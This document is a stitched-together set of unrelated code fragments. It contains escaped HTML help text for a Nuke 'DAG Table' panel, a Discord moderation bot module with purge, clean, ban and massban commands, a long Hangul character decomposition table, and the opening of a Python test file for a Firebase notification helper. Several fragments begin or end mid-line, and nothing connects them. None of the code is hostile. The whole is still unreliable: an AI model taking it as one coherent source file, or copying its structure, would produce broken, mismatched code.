econds to the ch\
osen value.\x0a \
<ul>\x0a \
<li\
> <b>ms</b> - mi\
lliseconds</li>\x0a\
\
<li> <b>s:ms</b>\
- seconds milli\
seconds</li>\x0a \
<li\
> <b>m:s</b> - m\
inutes seconds</\
li>\x0a \
<li> <b>m:s:\
ms</b> - minutes\
seconds millise\
conds</li>\x0a \
</ul>\x0a \
</dd>\x0a <\
/dl>\x0a</body>\x0a\x0a</\
html>\
\x00\x00\x03\xf7\
<\
!DOCTYPE html>\x0a<\
html>\x0a<style>\x0a</\
style>\x0a\x0a<body>\x0a\x0a\
<h1>DAG Tabl\
e</h1>\x0a <hr>\x0a\
<b>NOTE:</b>\
When opening a \
new Nuke session\
, the table will\
be empty.\x0a T\
o update its con\
tent you must cl\
ick on the <b>Re\
fresh Table</b> \
button. <br>\x0a \
<hr>\x0a\x0a <p>\x0a \
The table\
shows the curre\
nt nodes present\
in the DAG and\x0a\
their re\
spective profili\
ng stats if prof\
iling listener i\
s activated.\x0a \
</p>\x0a\x0a\x0a <h2>\
Order/Sort</h2>\x0a\
<p>\x0a \
The table allows\
to sort columns\
in ascending or\
descending orde\
r by clicking on\
a column header\
.\x0a </p>\x0a\x0a \
<h2>Navigation/I\
nteractions</h2>\
\x0a\x0a <p>\x0a \
The table can \
be navigated by \
mouse or arrow k\
eyboard when the\
table is in foc\
us.\x0a </p>\x0a \
<ul>\x0a <l\
i>Up/Down arrows\
will | |
await ctx.send(Translator.translate(ctx.guild, "mkick_success", _emote="YES", users=kicked, total=len(kicked)))
on_time = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
await Logging.log_to_guild(ctx.guild.id, "memberLogChannel", Translator.translate(ctx.guild, "log_mass_kick", _emote="SHOE", on_time=on_time, users=kicked, moderator=ctx.author, moderator_id=ctx.author.id, reason=reason))
@commands.guild_only()
@commands.command()
@commands.has_permissions(manage_messages=True)
async def purge(self, ctx, amount: RangedInt(1, 200)):
    """purge_help"""
    # NOTE: the docstring above is a translation key consumed by the help
    # command — do not turn it into descriptive prose.
    # Alias for "clean all": delegate to that subcommand with the same amount.
    await ctx.invoke(self.clean_all, amount)
@commands.guild_only()
@commands.group(aliases=["clear"])
@commands.has_permissions(manage_messages=True)
async def clean(self, ctx):
    """clean_help"""
    # BUG FIX: ctx.invoked_subcommand holds the invoked *sub*command (or None
    # when the bare group is called); it can never equal the group itself, so
    # the old `== self.clean` comparison meant this help fallback never ran.
    if ctx.invoked_subcommand is None:
        # NOTE(review): "qeury" looks like a typo for "query" — confirm against
        # the help command's parameter name before renaming it.
        await ctx.invoke(self.bot.get_command("help"), qeury="clean")
@commands.guild_only()
@clean.command("user")
@commands.has_permissions(manage_messages=True)
async def clean_user(self, ctx, users: commands.Greedy[DiscordUser], amount: RangedInt(1, 500) = 50):
    """clean_user_help"""
    # No users given -> nothing to delete; tell the invoker and bail out.
    if not users:
        return await ctx.send(Translator.translate(ctx.guild, "no_delete_then", _emote="THINK"))
    # Delete only messages authored by one of the requested users.
    target_ids = {u.id for u in users}
    await self.perform_cleaning(ctx, amount, lambda m: m.author.id in target_ids)
@commands.guild_only()
@clean.command("bots")
@commands.has_permissions(manage_messages=True)
async def clean_bots(self, ctx, amount: RangedInt(1, 200) = 50):
    """clean_bots_help"""
    # Delete only messages authored by bot accounts.
    await self.perform_cleaning(ctx, amount, lambda x: x.author.bot)
@commands.guild_only()
@clean.command("all")
@commands.has_permissions(manage_messages=True)
async def clean_all(self, ctx, amount: RangedInt(1, 200)):
    """clean_all_help"""
    # Unconditional predicate: every message in range gets deleted.
    await self.perform_cleaning(ctx, amount, lambda x: True)
@commands.guild_only()
@clean.command(name="last", usage="<duration>")
@commands.has_permissions(manage_messages=True)
async def clean_last(self, ctx: commands.Command, duration: Duration, excess = ""):
    """clean_last_help"""
    # When the user writes "10 minutes" the unit lands in `excess`, so fold
    # the trailing word back into the Duration before converting.
    if duration.unit is None:
        duration.unit = excess
    seconds_back = duration.to_seconds(ctx)
    cutoff = datetime.datetime.utcfromtimestamp(time.time() - seconds_back)
    await self.perform_cleaning(ctx, 500, lambda m: True, time=cutoff)
@commands.guild_only()
@clean.command("until")
@commands.has_permissions(manage_messages=True)
async def clean_until(self, ctx, message: discord.Message):
    """clean_until_help"""
    # Best effort: any failure is printed to the console rather than surfaced.
    try:
        await self.perform_cleaning(ctx, 500, lambda m: True, after=message)
    except Exception as error:
        print(error)
@commands.guild_only()
@clean.command("between")
@commands.has_permissions(manage_messages=True)
async def clean_between(self, ctx, start: discord.Message, end: discord.Message):
    """clean_between_help"""
    # Delete every message between the two boundary messages; perform_cleaning
    # forwards them as before/after to channel.purge.
    await self.perform_cleaning(ctx, 500, lambda x: True, before=end, after=start)
async def _ban(self, ctx, user, reason, days=0):
    # Low-level ban wrapper: reports failure in-channel instead of raising.
    try:
        await ctx.guild.ban(user=user, reason=reason, delete_message_days=days)
    except Exception as error:
        failure = Translator.translate(ctx.guild, "ban_failed", _emote="NO", error=error)
        return await ctx.send(failure)
async def _kick(self, ctx, user, reason):
    # Low-level kick wrapper: reports failure in-channel instead of raising.
    try:
        await ctx.guild.kick(user=user, reason=reason)
    except Exception as error:
        failure = Translator.translate(ctx.guild, "kick_failed", _emote="NO", error=error)
        return await ctx.send(failure)
async def _unban(self, ctx, user, reason):
    # Low-level unban wrapper: reports failure in-channel instead of raising.
    try:
        await ctx.guild.unban(user=user, reason=reason)
    except Exception as error:
        failure = Translator.translate(ctx.guild, "unban_failed", _emote="NO", error=error)
        return await ctx.send(failure)
async def _forceban(self, ctx, user, reason):
    # System accounts (discriminator "0000") can never be banned — refuse early.
    if user.discriminator == "0000":
        return await ctx.send(Translator.translate(ctx.guild, "is_system_user", _emote="NO"))
    # Ban without deleting any message history; report failure in-channel.
    try:
        await ctx.guild.ban(user=user, reason=reason)
    except Exception as error:
        failure = Translator.translate(ctx.guild, "ban_failed", _emote="NO", error=error)
        return await ctx.send(failure)
async def is_banned(self, ctx, user):
    # True when the guild ban list contains an entry for this user.
    # NOTE(review): the broad except also maps Forbidden/HTTP errors to False —
    # presumably intentional best-effort; confirm before narrowing to NotFound.
    try:
        await ctx.guild.fetch_ban(user)
    except Exception:
        return False
    return True
async def perform_cleaning(self, ctx, limit, check, *, before=None, after=None, time=None):
    """Bulk-delete up to ``limit`` messages in ctx.channel that pass ``check``.

    ``before``/``after`` may be Message objects or raw ids; ``time`` (a
    datetime) overrides ``after`` as the lower bound (used by "clean last").
    Only one clean may run per channel at a time.
    """
    if ctx.channel.id in self.bot.cleans_running:
        return await ctx.send(Translator.translate(ctx.guild, "already_cleaning", _emote="NO"))
    if limit > 500:
        return await ctx.send(Translator.translate(ctx.guild, "too_many_messages", _emote="NO", limit=limit))
    # Normalise boundaries: accept Message objects as-is, wrap raw ids.
    if before is None:
        before = ctx.message
    elif not isinstance(before, discord.Message):
        before = discord.Object(id=before)
    if after is not None and not isinstance(after, discord.Message):
        after = discord.Object(id=after)
    # after is set to a discord Object (message), which won't work for the
    # clean last command, therefore we change it if a time is given.
    if time is not None:
        after = time
    self.bot.cleans_running[ctx.channel.id] = set()
    try:
        deleted = await ctx.channel.purge(limit=limit, before=before, after=after, check=check)
        await ctx.send(Translator.translate(ctx.guild, "clean_success", _emote="YES", deleted=len(deleted), plural="" if len(deleted) == 1 else "s"))
    except Exception as ex:
        await ctx.send(Translator.translate(ctx.guild, "cleaning_error", _emote="NO", error=ex))
    # BUG FIX: this task was scheduled twice, so the second finish_purgings run
    # raised KeyError on the already-removed channel entry; schedule it once.
    self.bot.loop.create_task(self.finish_purgings(ctx.channel.id))
async def finish_purgings(self, channel_id):
    """Release the per-channel clean lock shortly after a purge finishes."""
    await asyncio.sleep(1)  # we don't want to miss any delete events
    # pop() with a default keeps this idempotent: the caller historically
    # scheduled this task twice, and `del` raised KeyError on the second run.
    self.bot.cleans_running.pop(channel_id, None)
async def can_act(self, ctx, target, moderator):
    """Return True when ``moderator`` (and the bot) may act on ``target``.

    Denied when the target outranks the moderator or the bot, owns the guild,
    is the moderator themselves, is the bot itself, or is already banned.
    """
    automod = ctx.guild.get_member(self.bot.user.id)
    if (target.top_role.position >= moderator.top_role.position
            or target.top_role.position >= automod.top_role.position
            or ctx.guild.owner.id == target.id
            or target.id == moderator.id
            or target.id == automod.id):
        return False
    try:
        await ctx.guild.fetch_ban(target)
    except discord.NotFound:
        # No ban entry -> the target is actionable.
        return True
    # fetch_ban succeeded -> target is already banned, nothing to do.
    # (The original trailing `else: return True` was unreachable: the try body
    # always returned False or raised, so the else clause never executed.)
    await ctx.send(Translator.translate(ctx.guild, "target_already_banned", _emote="NO_MOUTH"))
    return False
######## complex moderation commands
@commands.command()
@commands.guild_only()
@commands.has_permissions(ban_members=True)
async def massban(self, ctx, *, args):
    """massban_help"""
    # sometimes discord just thinks the author isn't a guild member, so
    # re-fetch a proper Member object when needed.
    if not isinstance(ctx.author, discord.Member):
        try:
            author = await ctx.guild.fetch_member(ctx.author.id)
        except discord.HTTPException:
            return await ctx.send(Translator.translate(ctx.guild, "no_member_object"))
    else:
        author = ctx.author
    # Define the flag-style arguments the command accepts.
    p = Arguments(add_help=False, allow_abbrev=False)
    p.add_argument("--channel", "-c")
    p.add_argument("--reason", "-r")
    p.add_argument("--search", type=int, default=100)
    p.add_argument("--regex")
    p.add_argument("--no-avatar", action="store_true")
    p.add_argument("--no-roles", action="store_true")
    p.add_argument("--created", type=int)
    p.add_argument("--joined", type=int)
    # NOTE(review): `str or int` evaluates to plain `str` at definition time;
    # kept as-is since the effective behavior (string values) is unchanged.
    p.add_argument("--joined-before", type=str or int)
    p.add_argument("--joined-after", type=str or int)
    p.add_argument("--contains")
    p.add_argument("--starts")
    p.add_argument("--ends")
    p.add_argument("--match")
    p.add_argument("--show", action="store_true")
    p.add_argument("--embeds", action="store_const", const=lambda m: len(m.embeds))
    p.add_argument("--files", action="store_const", const=lambda m: len(m.attachments))
    p.add_argument("--after", type=int)
    p.add_argument("--before", type=int)
    try:
        args = p.parse_args(shlex.split(args))
    except Exception as ex:
        return await ctx.send(str(ex))
    targets = []
    if args.channel:
        # Collect targets from the authors of matching messages in a channel.
        channel = await commands.TextChannelConverter().convert(ctx, args.channel)
        before = args.before and discord.Object(id=args.before)
        after = args.after and discord.Object(id=args.after)
        pr = []  # message-level predicates for the history scan
        if args.contains:
            pr.append(lambda m: args.contains.lower() in m.content.lower())
        if args.starts:
            pr.append(lambda m: m.content.startswith(args.starts))
        if args.ends:
            pr.append(lambda m: m.content.endswith(args.ends))
        if args.match:
            try:
                _match = re.compile(args.match)
            except re.error as ex:
                return await ctx.send(Translator.translate(ctx.guild, "invalid_regex", ex=ex))
            else:
                pr.append(lambda m, x=_match: x.match(m.content))
        if args.embeds:
            pr.append(args.embeds)
        if args.files:
            pr.append(args.files)
        async for message in channel.history(limit=min(max(1, args.search), 2000), before=before, after=after):
            if all(_p(message) for _p in pr):
                targets.append(message.author)
    else:
        # Target guild members directly; make sure the member cache is full.
        if ctx.guild.chunked:
            targets = ctx.guild.members
        else:
            async with ctx.typing():
                await ctx.guild.chunk(cache=True)
            targets = ctx.guild.members
    # Member-level predicates applied to whichever target pool we built.
    pr = [
        lambda m: isinstance(m, discord.Member) and can_execute(ctx, author, m),
        lambda m: not m.bot,
        lambda m: m.discriminator != "0000"
    ]
    converter = commands.MemberConverter()
    if args.regex:
        try:
            _regex = re.compile(args.regex)
        except re.error as ex:
            return await ctx.send(Translator.translate(ctx.guild, "invalid_regex", ex=ex))
        else:
            pr.append(lambda m, x=_regex: x.match(m.name))
    if args.no_avatar:
        pr.append(lambda m: m.avatar is None)
    if args.no_roles:
        pr.append(lambda m: len(getattr(m, "roles", [])) <= 1)
    now = datetime.datetime.utcnow()
    if args.created:
        def created(member, *, offset=now - datetime.timedelta(minutes=args.created)):
            return member.created_at > offset
        pr.append(created)
    if args.joined:
        def joined(member, *, offset=now - datetime.timedelta(minutes=args.joined)):
            if isinstance(member, discord.User):
                return True  # in this case they already left the server
            return member.joined_at > offset
        pr.append(joined)
    if args.joined_after:
        _joined_after_member = await converter.convert(ctx, args.joined_after)
        def joined_after(member, *, _other=_joined_after_member):
            return member.joined_at and _other.joined_at and member.joined_at > _other.joined_at
        pr.append(joined_after)
    if args.joined_before:
        # BUG FIX: this previously converted args.joined_after (copy-paste),
        # so --joined-before compared against the wrong reference member.
        _joined_before_member = await converter.convert(ctx, args.joined_before)
        def joined_before(member, *, _other=_joined_before_member):
            return member.joined_at and _other.joined_at and member.joined_at < _other.joined_at
        pr.append(joined_before)
    targets = {m for m in targets if all(_p(m) for _p in pr)}
    if len(targets) == 0:
        return await ctx.send(Translator.translate(ctx.guild, "no_targets_found", _emote="NO"))
    if args.show:
        # Dry run: report who would be banned instead of banning.
        targets = sorted(targets, key=lambda m: m.joined_at or now)
        fmt = "\n".join(f"{m.id}\tJoined: {m.joined_at}\tCreated: {m.created_at}\n{m}" for m in targets)
        content = f"Time right now: {datetime.datetime.utcnow()}\nTotal targets: {len(targets)}\n{fmt}"
        f = discord.File(io.BytesIO(content.encode("utf-8")), filename="members.txt")
        return await ctx.send(file=f)
    if args.reason is None:
        return await ctx.send(Translator.translate(ctx.guild, "missing_reason_flag"))
    else:
        reason = await Reason().convert(ctx, args.reason)
    confirm = await ctx.prompt(f'This action will ban {len(targets)} member{"" if len(targets) == 1 else "s"}. Are you sure?')
    if not confirm:
        return await ctx.send(Translator.translate(ctx.guild, "aborting"))
    banned = 0
    for target in targets:
        try:
            await self._forceban(ctx, target, reason)
            self.bot.running_removals.add(target.id)
            case = DBUtils.new_case()
            timestamp = datetime.datetime.utcnow().strftime("%d/%m/%Y %H:%M")
            DBUtils.insert(db.inf, new_infraction(case, ctx.guild.id, target, ctx.author, timestamp, "Ban", f"[Custom Ban] {reason}"))
        except discord.HTTPException:
            pass  # best effort: skip targets the API refuses to ban
        else:
            banned += 1
    await ctx.send(Translator.translate(ctx.guild, "mban_success", _emote="YES", users=banned, total=len(targets)))
    on_time = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
    await Logging.log_to_guild(ctx.guild.id, "memberLogChannel", Translator.translate(ctx.guild, "log_mass_ban", _emote="ALERT", on_time=on_time, users=banned, moderator=ctx.author, moderator_id=ctx.author.id, reason=reason))
@clean.command()
@commands.guild_only()
@commands.has_permissions(manage_messages=True)
async def custom(self, ctx, *, args: str):
"""clean_custom_help"""
try:
p = Arguments(add_help=False, allow_abbrev=False)
p.add_argument("--user", nargs="+")
p.add_argument("--contains", nargs="+")
p.add_argument("--starts", nargs="+")
p.add_argument("--ends", nargs="+")
p.add_argument("--or", action="store_true", dest="_or")
p.add_argument("--not", action="store_true", dest="_not")
p.add_argument("--emoji", action="store_true")
p.add_argument("--bot", action="store_const", const=lambda m: m.author.bot)
p.add_argument("--embeds", action="store_const", const=lambda m: len(m.embeds))
p.add_argument("--files", action="store_const", const=lambda m: len(m.attachments))
p.add_argument("--reactions", action="store_const", const=lambda m: len(m.reactions))
p.add_argument("--search", type=int)
p.add_argument("--after", type=int)
p.add_argument("--before", type=int)
try:
args = p.parse_args(shlex.split(args))
except Exception as ex:
return await ctx.send(str(ex))
pr = []
if args.bot:
pr.append(args.bot)
if args.embeds:
pr.append(args.embeds)
if args.files:
pr.append(args.files)
if args.reactions:
pr.append(args.reactions)
if args.emoji:
custom_emote = re.compile(r"<:(\w+):(\d+)>")
pr.append(lambda m: custom_emote.search(m.content))
if args.user:
targets = []
converter = commands.MemberConverter()
for t in args.user:
try:
target = await converter.convert(ctx, t)
targets.append(target)
except Exception as ex:
return await ctx.send(str(ex))
pr.append(lambda m: m.author in targets)
if args.contains:
pr.append(lambda m: any(s in m.content for s in args.contains))
if args.starts:
pr.append(lambda m: any(m.content.startswith(s) for s in args.starts))
if args.ends:
pr.append(lambda m: any(m.content.endswith(s) for s in args.ends))
o = all if not args._or else any
def check(m):
r = o(p(m) for p in pr)
if args._not:
return not r
return r
if args.after:
if args.search is None:
args.search = 2000
if args.search is None:
args.search = 100
args.search = max(0, min(2000, args.search))
def point(ctx, before=None, after=None):
if before is None:
before = ctx.message
else:
before = discord.Object(id=before)
if after is not None:
after = discord.Object(id=after)
return before, after
before, after = point(ctx, args.before, args.after)
if ctx.channel.id in self.bot.cleans_running:
return await ctx.send(Translator.translate(ctx.guild, "already_cleaning", _emote="NO"))
self.bot.cleans_running[ctx.channel.id] = set()
_msg = | |
49113: "4360 4462 4532",
49114: "4360 4462 4533",
49115: "4360 4462 4534",
49116: "4360 4462 4535",
49117: "4360 4462 4536",
49118: "4360 4462 4537",
49119: "4360 4462 4538",
49120: "4360 4462 4539",
49121: "4360 4462 4540",
49122: "4360 4462 4541",
49123: "4360 4462 4542",
49124: "4360 4462 4543",
49125: "4360 4462 4544",
49126: "4360 4462 4545",
49127: "4360 4462 4546",
49128: "4360 4463",
49129: "4360 4463 4520",
49130: "4360 4463 4521",
49131: "4360 4463 4522",
49132: "4360 4463 4523",
49133: "4360 4463 4524",
49134: "4360 4463 4525",
49135: "4360 4463 4526",
49136: "4360 4463 4527",
49137: "4360 4463 4528",
49138: "4360 4463 4529",
49139: "4360 4463 4530",
49140: "4360 4463 4531",
49141: "4360 4463 4532",
49142: "4360 4463 4533",
49143: "4360 4463 4534",
49144: "4360 4463 4535",
49145: "4360 4463 4536",
49146: "4360 4463 4537",
49147: "4360 4463 4538",
49148: "4360 4463 4539",
49149: "4360 4463 4540",
49150: "4360 4463 4541",
49151: "4360 4463 4542",
49152: "4360 4463 4543",
49153: "4360 4463 4544",
49154: "4360 4463 4545",
49155: "4360 4463 4546",
49156: "4360 4464",
49157: "4360 4464 4520",
49158: "4360 4464 4521",
49159: "4360 4464 4522",
49160: "4360 4464 4523",
49161: "4360 4464 4524",
49162: "4360 4464 4525",
49163: "4360 4464 4526",
49164: "4360 4464 4527",
49165: "4360 4464 4528",
49166: "4360 4464 4529",
49167: "4360 4464 4530",
49168: "4360 4464 4531",
49169: "4360 4464 4532",
49170: "4360 4464 4533",
49171: "4360 4464 4534",
49172: "4360 4464 4535",
49173: "4360 4464 4536",
49174: "4360 4464 4537",
49175: "4360 4464 4538",
49176: "4360 4464 4539",
49177: "4360 4464 4540",
49178: "4360 4464 4541",
49179: "4360 4464 4542",
49180: "4360 4464 4543",
49181: "4360 4464 4544",
49182: "4360 4464 4545",
49183: "4360 4464 4546",
49184: "4360 4465",
49185: "4360 4465 4520",
49186: "4360 4465 4521",
49187: "4360 4465 4522",
49188: "4360 4465 4523",
49189: "4360 4465 4524",
49190: "4360 4465 4525",
49191: "4360 4465 4526",
49192: "4360 4465 4527",
49193: "4360 4465 4528",
49194: "4360 4465 4529",
49195: "4360 4465 4530",
49196: "4360 4465 4531",
49197: "4360 4465 4532",
49198: "4360 4465 4533",
49199: "4360 4465 4534",
49200: "4360 4465 4535",
49201: "4360 4465 4536",
49202: "4360 4465 4537",
49203: "4360 4465 4538",
49204: "4360 4465 4539",
49205: "4360 4465 4540",
49206: "4360 4465 4541",
49207: "4360 4465 4542",
49208: "4360 4465 4543",
49209: "4360 4465 4544",
49210: "4360 4465 4545",
49211: "4360 4465 4546",
49212: "4360 4466",
49213: "4360 4466 4520",
49214: "4360 4466 4521",
49215: "4360 4466 4522",
49216: "4360 4466 4523",
49217: "4360 4466 4524",
49218: "4360 4466 4525",
49219: "4360 4466 4526",
49220: "4360 4466 4527",
49221: "4360 4466 4528",
49222: "4360 4466 4529",
49223: "4360 4466 4530",
49224: "4360 4466 4531",
49225: "4360 4466 4532",
49226: "4360 4466 4533",
49227: "4360 4466 4534",
49228: "4360 4466 4535",
49229: "4360 4466 4536",
49230: "4360 4466 4537",
49231: "4360 4466 4538",
49232: "4360 4466 4539",
49233: "4360 4466 4540",
49234: "4360 4466 4541",
49235: "4360 4466 4542",
49236: "4360 4466 4543",
49237: "4360 4466 4544",
49238: "4360 4466 4545",
49239: "4360 4466 4546",
49240: "4360 4467",
49241: "4360 4467 4520",
49242: "4360 4467 4521",
49243: "4360 4467 4522",
49244: "4360 4467 4523",
49245: "4360 4467 4524",
49246: "4360 4467 4525",
49247: "4360 4467 4526",
49248: "4360 4467 4527",
49249: "4360 4467 4528",
49250: "4360 4467 4529",
49251: "4360 4467 4530",
49252: "4360 4467 4531",
49253: "4360 4467 4532",
49254: "4360 4467 4533",
49255: "4360 4467 4534",
49256: "4360 4467 4535",
49257: "4360 4467 4536",
49258: "4360 4467 4537",
49259: "4360 4467 4538",
49260: "4360 4467 4539",
49261: "4360 4467 4540",
49262: "4360 4467 4541",
49263: "4360 4467 4542",
49264: "4360 4467 4543",
49265: "4360 4467 4544",
49266: "4360 4467 4545",
49267: "4360 4467 4546",
49268: "4360 4468",
49269: "4360 4468 4520",
49270: "4360 4468 4521",
49271: "4360 4468 4522",
49272: "4360 4468 4523",
49273: "4360 4468 4524",
49274: "4360 4468 4525",
49275: "4360 4468 4526",
49276: "4360 4468 4527",
49277: "4360 4468 4528",
49278: "4360 4468 4529",
49279: "4360 4468 4530",
49280: "4360 4468 4531",
49281: "4360 4468 4532",
49282: "4360 4468 4533",
49283: "4360 4468 4534",
49284: "4360 4468 4535",
49285: "4360 4468 4536",
49286: "4360 4468 4537",
49287: "4360 4468 4538",
49288: "4360 4468 4539",
49289: "4360 4468 4540",
49290: "4360 4468 4541",
49291: "4360 4468 4542",
49292: "4360 4468 4543",
49293: "4360 4468 4544",
49294: "4360 4468 4545",
49295: "4360 4468 4546",
49296: "4360 4469",
49297: "4360 4469 4520",
49298: "4360 4469 4521",
49299: "4360 4469 4522",
49300: "4360 4469 4523",
49301: "4360 4469 4524",
49302: "4360 4469 4525",
49303: "4360 4469 4526",
49304: "4360 4469 4527",
49305: "4360 4469 4528",
49306: "4360 4469 4529",
49307: "4360 4469 4530",
49308: "4360 4469 4531",
49309: "4360 4469 4532",
49310: "4360 4469 4533",
49311: "4360 4469 4534",
49312: "4360 4469 4535",
49313: "4360 4469 4536",
49314: "4360 4469 4537",
49315: "4360 4469 4538",
49316: "4360 4469 4539",
49317: "4360 4469 4540",
49318: "4360 4469 4541",
49319: "4360 4469 4542",
49320: "4360 4469 4543",
49321: "4360 4469 4544",
49322: "4360 4469 4545",
49323: "4360 4469 4546",
49324: "4361 4449",
49325: "4361 4449 4520",
49326: "4361 4449 4521",
49327: "4361 4449 4522",
49328: "4361 4449 4523",
49329: "4361 4449 4524",
49330: "4361 4449 4525",
49331: "4361 4449 4526",
49332: "4361 4449 4527",
49333: "4361 4449 4528",
49334: "4361 4449 4529",
49335: "4361 4449 4530",
49336: "4361 4449 4531",
49337: "4361 4449 4532",
49338: "4361 4449 4533",
49339: "4361 4449 4534",
49340: "4361 4449 4535",
49341: "4361 4449 4536",
49342: "4361 4449 4537",
49343: "4361 4449 4538",
49344: "4361 4449 4539",
49345: "4361 4449 4540",
49346: "4361 4449 4541",
49347: "4361 4449 4542",
49348: "4361 4449 4543",
49349: "4361 4449 4544",
49350: "4361 4449 4545",
49351: "4361 4449 4546",
49352: "4361 4450",
49353: "4361 4450 4520",
49354: "4361 4450 4521",
49355: "4361 4450 4522",
49356: "4361 4450 4523",
49357: "4361 4450 4524",
49358: "4361 4450 4525",
49359: "4361 4450 4526",
49360: "4361 4450 4527",
49361: "4361 4450 4528",
49362: "4361 4450 4529",
49363: "4361 4450 4530",
49364: "4361 4450 4531",
49365: "4361 4450 4532",
49366: "4361 4450 4533",
49367: "4361 4450 4534",
49368: "4361 4450 4535",
49369: "4361 4450 4536",
49370: "4361 4450 4537",
49371: "4361 4450 4538",
49372: "4361 4450 4539",
49373: "4361 4450 4540",
49374: "4361 4450 4541",
49375: "4361 4450 4542",
49376: "4361 4450 4543",
49377: "4361 4450 4544",
49378: "4361 4450 4545",
49379: "4361 4450 4546",
49380: "4361 4451",
49381: "4361 4451 4520",
49382: "4361 4451 4521",
49383: "4361 4451 4522",
49384: "4361 4451 4523",
49385: "4361 4451 4524",
49386: "4361 4451 4525",
49387: "4361 4451 4526",
49388: "4361 4451 4527",
49389: "4361 4451 4528",
49390: "4361 4451 4529",
49391: "4361 4451 4530",
49392: "4361 4451 4531",
49393: "4361 4451 4532",
49394: "4361 4451 4533",
49395: "4361 4451 4534",
49396: "4361 4451 4535",
49397: "4361 4451 4536",
49398: "4361 4451 4537",
49399: "4361 4451 4538",
49400: "4361 4451 4539",
49401: "4361 4451 4540",
49402: "4361 4451 4541",
49403: "4361 4451 4542",
49404: "4361 4451 4543",
49405: "4361 4451 4544",
49406: "4361 4451 4545",
49407: "4361 4451 4546",
49408: "4361 4452",
49409: "4361 4452 4520",
49410: "4361 4452 4521",
49411: "4361 4452 4522",
49412: "4361 4452 4523",
49413: "4361 4452 4524",
49414: "4361 4452 4525",
49415: "4361 4452 4526",
49416: "4361 4452 4527",
49417: "4361 4452 4528",
49418: "4361 4452 4529",
49419: "4361 4452 4530",
49420: "4361 4452 4531",
49421: "4361 4452 4532",
49422: "4361 4452 4533",
49423: "4361 4452 4534",
49424: "4361 4452 4535",
49425: "4361 4452 4536",
49426: "4361 4452 4537",
49427: "4361 4452 4538",
49428: "4361 4452 4539",
49429: "4361 4452 4540",
49430: "4361 4452 4541",
49431: "4361 4452 4542",
49432: "4361 4452 4543",
49433: "4361 4452 4544",
49434: "4361 4452 4545",
49435: "4361 4452 | |
# <reponame>guineawheek/ftc-data-take-2
import datetime
from firebase_admin import messaging
from firebase_admin.exceptions import FirebaseError, InvalidArgumentError, InternalError, UnavailableError
from firebase_admin.messaging import QuotaExceededError, SenderIdMismatchError, ThirdPartyAuthError, UnregisteredError
import json
from mock import patch, Mock, ANY
import unittest2
from google.appengine.api.taskqueue import taskqueue
from google.appengine.ext import deferred
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from consts.award_type import AwardType
from consts.client_type import ClientType
from consts.event_type import EventType
from consts.model_type import ModelType
from consts.notification_type import NotificationType
import helpers.tbans_helper
from helpers.event.event_test_creator import EventTestCreator
from helpers.match.match_test_creator import MatchTestCreator
from helpers.tbans_helper import TBANSHelper, _firebase_app
from models.account import Account
from models.award import Award
from models.event import Event
from models.event_details import EventDetails
from models.match import Match
from models.team import Team
from models.mobile_client import MobileClient
from models.subscription import Subscription
from models.notifications.alliance_selection import AllianceSelectionNotification
from models.notifications.awards import AwardsNotification
from models.notifications.broadcast import BroadcastNotification
from models.notifications.event_level import EventLevelNotification
from models.notifications.event_schedule import EventScheduleNotification
from models.notifications.match_score import MatchScoreNotification
from models.notifications.match_upcoming import MatchUpcomingNotification
from models.notifications.match_video import MatchVideoNotification
from models.notifications.requests.fcm_request import FCMRequest
from models.notifications.requests.webhook_request import WebhookRequest
from tests.mocks.notifications.mock_notification import MockNotification
def fcm_messaging_ids(user_id):
    """Return the FCM messaging IDs of all FCM-type clients for an account."""
    account_key = ndb.Key(Account, user_id)
    query = MobileClient.query(
        MobileClient.client_type.IN(ClientType.FCM_CLIENTS),
        ancestor=account_key
    )
    # Projection query: only the messaging_id property is fetched.
    return [client.messaging_id
            for client in query.fetch(projection=[MobileClient.messaging_id])]
class TestTBANSHelper(unittest2.TestCase):
def setUp(self):
    """Activate a GAE testbed (datastore, memcache, app identity, taskqueue)
    and seed the fixtures used by the tests: a future Event, a Team, and an
    unplayed Match."""
    self.testbed = testbed.Testbed()
    self.testbed.activate()
    self.testbed.init_datastore_v3_stub()
    self.testbed.init_memcache_stub()
    self.testbed.init_app_identity_stub()
    # root_path='.' lets the taskqueue stub locate the queue configuration.
    self.testbed.init_taskqueue_stub(root_path='.')
    self.taskqueue_stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
    ndb.get_context().clear_cache()  # Prevent data from leaking between tests
    self.event = EventTestCreator.createFutureEvent()
    self.team = Team(
        id='frc7332',
        team_number=7332
    )
    self.team.put()
    # Unplayed qualification match (scores of -1) featuring frc7332.
    # NOTE: not put() here — it exists only in memory unless a test stores it.
    self.match = Match(
        id='2020miket_qm1',
        event=self.event.key,
        comp_level='qm',
        set_number=1,
        match_number=1,
        team_key_names=['frc7332'],
        alliances_json=json.dumps({
            'red': {
                'teams': ['frc1', 'frc2', 'frc7332'],
                'score': -1,
            },
            'blue': {
                'teams': ['frc4', 'frc5', 'frc6'],
                'score': -1,
            }
        }),
        year=2020
    )
def tearDown(self):
    # Deactivate the testbed so its service stubs don't leak between tests.
    self.testbed.deactivate()
def test_firebase_app(self):
    """_firebase_app returns a single shared app named 'tbans'."""
    # First call should produce a usable app.
    first = _firebase_app()
    self.assertIsNotNone(first)
    self.assertEqual(first.name, 'tbans')
    # A repeated call must not crash...
    second = _firebase_app()
    self.assertIsNotNone(second)
    self.assertEqual(second.name, 'tbans')
    # ...and must hand back the very same app object.
    self.assertEqual(first, second)
def test_alliance_selection_no_users(self):
    """No subscribers means _send is never invoked."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.alliance_selection(self.event)
        send_mock.assert_not_called()
def test_alliance_selection_user_id(self):
    """An explicit user_id routes the notification to exactly that user."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.alliance_selection(self.event, 'user_id')
        send_mock.assert_called_once()
        # First positional arg of _send is the recipient user-id list.
        self.assertEqual(send_mock.call_args[0][0], ['user_id'])
def test_alliance_selection(self):
    """Alliance-selection fan-out: the Event subscriber and the picked
    team's subscriber are notified; a team that was not picked is not."""
    # Insert a Subscription for this Event and these Teams so we call to send
    Subscription(
        parent=ndb.Key(Account, 'user_id_1'),
        user_id='user_id_1',
        model_key='frc1',
        model_type=ModelType.TEAM,
        notification_types=[NotificationType.ALLIANCE_SELECTION]
    ).put()
    Subscription(
        parent=ndb.Key(Account, 'user_id_2'),
        user_id='user_id_2',
